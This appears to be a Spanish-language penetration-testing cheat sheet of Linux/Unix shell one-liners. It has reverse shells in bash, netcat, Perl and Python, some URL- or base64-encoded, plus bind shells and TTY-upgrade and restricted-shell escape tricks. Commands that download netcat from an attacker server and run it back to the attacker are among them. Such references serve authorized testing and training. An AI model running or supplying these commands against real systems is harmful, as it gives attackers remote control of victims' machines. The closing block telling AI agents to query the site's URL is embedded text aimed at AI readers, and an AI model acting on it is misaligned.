# Linux/Unix ## Reverse shells ### Bash ```shell bash -c 'bash -i >& /dev/tcp// 0>&1' bash+-c+'bash+-i+>%26+/dev/tcp//+0>%261' # URL Encode bash -i >& /dev/tcp// 0>&1 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc

>/tmp/f ``` ```sh echo -n "nc.traditional -e /bin/bash

" | base64 -w 0 bmMudHJhZGl0aW9uYWwgLWUgL2Jpbi9iYXNoIDxhdHRhY2tlci1JUC1hZGRyZXNzPiA8bGlzdGVuLXBvcnQ+ `echo "bmMudHJhZGl0aW9uYWwgLWUgL2Jpbi9iYXNoIDxhdHRhY2tlci1JUC1hZGRyZXNzPiA8bGlzdGVuLXBvcnQ+" | base64 -d` ``` ### Netcat ```bash /bin/nc -nv

-e /bin/bash /usr/bin/nc -nv

-e /bin/bash ``` ```bash # Máquina atacante cp /bin/nc . python3 -m http.server 80 nc -lvnp # Máquina victima ## wget wget http://:80/nc -O /tmp/nc; chmod 755 /tmp/nc; /tmp/nc -nv

-e /bin/bash ## curl curl http://:80/nc -o /tmp/nc; chmod 755 /tmp/nc; /tmp/nc -nv

-e /bin/bash ``` ### Perl ```bash perl -e 'use Socket;$i="";$p=;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ``` ### Python ```shell # /bin/sh python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' # /bin/bash python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash"]);' ``` ## Bind shells ### Bash ```bash rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp >/tmp/f ``` ### Python ```shell python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")' ``` ## Spawning TTY shell ### General ```shell script /dev/null -c bash Ctrl+Z # Para ZSH debe ser ingresado en una sola línea stty raw -echo;fg stty raw -echo fg reset xterm # Obtener el valor de las siguientes variables desde otra ventana de terminal maximizada echo $TERM stty size # Aplicar los valores obtenidos en la shell obtenida export TERM= export SHELL=/bin/bash stty rows columns ``` ### Python ```shell which python which python3 /usr/bin/ -c "import pty; pty.spawn('/bin/bash');" ``` ### sh ```shell script /dev/null -c bash ``` ## Escapar shell restringida ```shell man ls shift + 1 !bash ``` ```shell vim :set shell=/bin/sh :shell ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://pentesting.mrw0l05zyn.cl/explotacion/shells/linux-unix.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.